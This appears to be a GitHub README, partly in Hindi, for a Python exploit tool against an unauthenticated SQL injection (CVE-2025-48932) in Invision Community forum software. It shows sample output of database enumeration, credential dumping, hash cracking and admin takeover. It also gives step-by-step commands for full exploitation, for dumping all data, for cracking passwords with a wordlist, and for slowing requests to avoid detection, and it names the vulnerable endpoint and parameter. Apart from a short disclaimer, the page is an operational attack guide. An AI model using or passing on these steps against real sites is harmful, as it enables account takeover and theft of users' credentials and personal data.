
CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna
CVE-2025-48932 Invision Community संस्करण ≤ 4.7.20 में खोजी गई एक गंभीर अप्रमाणित ब्लाइंड SQL इंजेक्शन भेद्यता है। यह एक्सप्लॉइट दूरस्थ हमलावरों को अनुमति देता है:
$ python3 exploit.py -u https://vulnerable-site.com -v
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2025-48932 - Invision Community SQL Injection ║
║ Author: Sudeepa Wanigarathna ║
║ Critical: Unauthenticated Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!
[*] Enumerating database information...
[+] Database Information:
Version: 10.4.32-MariaDB
User: invision@localhost
Database: invision_community
Hostname: localhost
Basedir: /usr/
Datadir: /var/lib/mysql/
[*] Enumerating databases...
[+] Found 5 databases
Found: information_schema
Found: invision_community
Found: mysql
Found: performance_schema
Found: phpmyadmin
[*] Enumerating tables in invision_community...
[+] Found 12 tables
Found: core_members
Found: core_sessions
Found: admin_members
Found: cms_categories
Found: forums_posts
...
[*] Searching for credentials...
[+] Found credential table: core_members
Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...
[*] Extracting admin information...
[+] Admin Information Found:
name: admin
email: [email protected]
id: 1
password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...
[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!
[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!
[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json
{
"target": "https://vulnerable-site.com",
"timestamp": "2026-08-02T12:34:56.789Z",
"vulnerable": true,
"database": {
"version": "10.4.32-MariaDB",
"user": "invision@localhost",
"database": "invision_community",
"hostname": "localhost"
},
"databases": [
"information_schema",
"invision_community",
"mysql",
"performance_schema",
"phpmyadmin"
],
"tables": [
"core_members",
"core_sessions",
"admin_members"
],
"credentials": [
{
"username": "admin",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
"email": "[email protected]"
}
],
"admin_info": {
"name": "admin",
"email": "[email protected]",
"id": "1",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
},
"summary": {
"total_databases": 5,
"total_tables": 12,
"total_credentials": 3,
"vulnerable": true,
"successful": true
}
}
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit
# No dependencies to install! Just run it.
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only
# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v
# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v
# Save results to custom file
python3 exploit.py -u https://example.com -o results.json
# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10
# Dump all available data
python3 exploit.py -u https://example.com --dump-all
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v
# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json
# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!
# Download popular wordlist
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
/applications/calendar/modules/front/calendar/view.phpIPS\calendar\modules\front\calendar\view::search()location (उपयोगकर्ता-आपूर्ति इनपुट)GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
इस उपकरण का उपयोग करके, आप सहमत हैं:
कंप्यूटर प्रणालियों तक अनधिकृत पहुंच अवैध और अनैतिक है।
invision_exploit_report_[timestamp].json
├── target # Target URL
├── timestamp # Exploit timestamp
├── vulnerable # Vulnerability status
├── database # Database information
├── databases # List of databases
├── tables # List of tables
├── credentials # Extracted credentials
├── admin_info # Admin user information
└── summary # Exploitation summary
समस्या: कनेक्शन टाइमआउट
# Solution: Increase timeout or check network
python3 exploit.py -u https://example.com --timeout 60
समस्या: SSL प्रमाणपत्र त्रुटियां
# Solution: Disable SSL verification (not recommended for production)
python3 exploit.py -u https://example.com --no-verify-ssl
समस्या: रेट लिमिटिंग का पता चला
# Solution: Reduce threads and increase delays
python3 exploit.py -u https://example.com -t 2 --delay 2
समस्या: कोई भेद्य पैरामीटर नहीं मिला
# Solution: Ensure calendar app is installed and GeoLocation is enabled
# Check: /applications/calendar/modules/front/calendar/view.php exists
हम योगदान का स्वागत करते हैं! कृपया हमारे योगदान दिशानिर्देश देखें।
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)सुरक्षा शोधकर्ता और बग बाउंटी हंटर
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
यदि इस प्रोजेक्ट ने आपकी मदद की या आपको यह रोचक लगा:
साइबर सुरक्षा शोधकर्ता | सॉफ्टवेयर इंजीनियर | CTF इंजीनियर
यह प्रोजेक्ट सुरक्षा शोध, रक्षात्मक विश्लेषण और अधिकृत पेनेट्रेशन परीक्षण के लिए प्रदान किया गया है। उपयोगकर्ता सभी लागू कानूनों का पालन करने और उपयोग से पहले उचित अधिकार प्राप्त करने के लिए जिम्मेदार हैं।
| विशेषता | विवरण | स्थिति |
|---|
| 🚀 शून्य निर्भरताएं | शुद्ध Python मानक पुस्तकालय - pip इंस्टॉल की आवश्यकता नहीं | ✅ |
| ⚡ मल्टी-थ्रेडेड | कॉन्फ़िगर करने योग्य थ्रेड्स के साथ बिजली-तेज़ डेटा निष्कर्षण | ✅ |
| 🤖 पूर्णतः स्वचालित | पहचान से रिपोर्टिंग तक पूर्ण शोषण श्रृंखला | ✅ |
| 👑 व्यवस्थापक अधिग्रहण | सत्र हाईजैकिंग और विशेषाधिकार वृद्धि | ✅ |
| 🔑 क्रेडेंशियल डंपिंग | उपयोगकर्ता, पासवर्ड हैश, ईमेल निकालें | ✅ |
| 🔓 पासवर्ड क्रैकिंग | वर्डलिस्ट समर्थन के साथ अंतर्निहित हैश क्रैकिंग | ✅ |
| 📋 JSON रिपोर्टिंग | विश्लेषण और दस्तावेज़ीकरण के लिए संरचित आउटपुट | ✅ |
| 🔌 प्रॉक्सी समर्थन | Burp Suite और कस्टम प्रॉक्सी एकीकरण | ✅ |
| 🎨 रंगीन आउटपुट | प्रगति संकेतकों के साथ सुंदर टर्मिनल आउटपुट | ✅ |
| 🛡️ रेट लिमिटिंग | पहचान से बचने के लिए अंतर्निहित विलंब | ✅ |
| तर्क | विवरण | उदाहरण |
|---|
-u, --url | लक्ष्य URL (आवश्यक) | -u https://example.com |
-p, --proxy | प्रॉक्सी URL | -p http://127.0.0.1:8080 |
-t, --threads | थ्रेड्स की संख्या (डिफ़ॉल्ट: 5) | -t 10 |
-o, --output | परिणामों के लिए आउटपुट फ़ाइल | -o results.json |
-v, --verbose | विस्तृत आउटपुट सक्षम करें | -v |
--check-only | केवल भेद्यता जांचें | --check-only |
--dump-all | सभी उपलब्ध डेटा डंप करें | --dump-all |
--wordlist | क्रैकिंग के लिए वर्डलिस्ट फ़ाइल | --wordlist rockyou.txt |